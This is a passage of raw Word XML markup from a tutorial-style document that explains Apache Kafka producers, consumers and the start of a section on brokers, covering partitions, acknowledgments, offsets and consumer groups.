          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D0C24A0" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66" w:rsidP="00603C66">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1. Producer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E5F9CC" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="256"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Definition</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: A </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>producer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an application that sends messages (or records) to a Kafka topic. Producers write data into Kafka topics. Each record consists of a key, a value, and optional metadata like headers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52ACE19F" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="256"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Role</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The producer is responsible for creating and sending messages to Kafka brokers. It pushes records to topics, and it can decide which partition to write the record to, either based on a partition key or using Kafka’s default partitioning mechanism.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D587AC9" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="256"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Producer Responsibilities</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566B4BAF" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="256"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Decides the topic and partition where the message should be sent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D434A2B" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="256"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Ensures message reliability via configurations like acks (acknowledgments).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49814C68" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="256"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Handles backpressure by buffering records when necessary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005D0422" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66" w:rsidP="00603C66">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>How it interacts with other components</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B74315F" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="257"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The producer sends records to a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka broker</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0396B2A7" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="257"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Kafka brokers then store the records in the corresponding </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>partition</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> within the topic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475067CE" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00603C66">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="59635F64">
          <v:rect id="_x0000_i3066" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8A302B" w14:textId="77777777" w:rsidR="007D5085" w:rsidRPr="00CE4B95" w:rsidRDefault="007D5085" w:rsidP="00603C66">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72AB2ECA" w14:textId="13DDC98F" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66" w:rsidP="00603C66">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2. Consumer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2EF657" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="258"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Definition</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: A </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>consumer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an application that reads messages (or records) from Kafka topics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AD444B" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="258"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Role</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Consumers subscribe to one or more Kafka topics and read messages from them. Consumers can read messages in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>pull</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> model, meaning they request messages from a broker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3221BF2C" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="258"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Consumer Responsibilities</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AFD13A" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="258"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Pulls records from Kafka brokers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFA7A89" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="258"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Keeps track of the offset (i.e., position) of the messages that it has processed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163B92CB" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66" w:rsidP="00603C66">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>How it interacts with other components</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067B31FE" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="259"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Consumers read messages from </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>topic</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Each consumer can read from one or more partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F399240" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="259"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Consumers belong to a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>consumer group</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for load balancing and fault tolerance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAC64D6" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00603C66">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="544F569E">
          <v:rect id="_x0000_i3067" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A53970" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66" w:rsidP="00603C66">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3. Broker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B995368" w14:textId="77777777" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00603C66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="260"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Definition</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: A </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
